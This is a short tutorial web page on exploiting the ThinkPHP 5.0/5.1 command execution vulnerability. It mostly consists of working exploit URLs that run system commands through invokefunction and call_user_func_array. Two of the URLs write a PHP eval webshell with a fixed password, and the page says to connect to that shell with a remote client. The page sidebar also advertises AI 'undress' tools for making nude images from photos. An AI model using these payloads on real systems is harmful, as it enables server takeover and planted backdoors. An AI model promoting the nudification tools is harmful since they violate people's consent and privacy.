The following is the thinkphp framework tutorial column to introduce you to ThinkPHP vulnerability exploitation. I hope it will be helpful to friends in need!
thinkphp_5x_Command Execution Vulnerability
Affected versions include 5.0 and 5.1 versions
Docker vulnerability environment source code: https://github.com/vulnspy/thinkphp-5.1.29
Local environment setup:
thinkphp5.0.15 php5.6n apache2.0http://www.thinkphp.cn/donate/download/id/1125.html
Use the system function to execute remote commands
EXP http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Write phpinfo() information through the phpinfo function
EXP:http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index .php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Write shell
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php 或者 http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
Connect using a kitchen knife
`
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php The password is zane
http://127.0.0.1/middleware/thinkphp_5.0.15_full/ test.php Password is zane
`
The above is the detailed content of About ThinkPHP vulnerability exploitation. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
MinGW - Minimalist GNU for Windows
This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.
SAP NetWeaver Server Adapter for Eclipse
Integrate Eclipse with SAP NetWeaver application server.
Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.
mPDF
mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),
Dreamweaver CS6
Visual web development tools
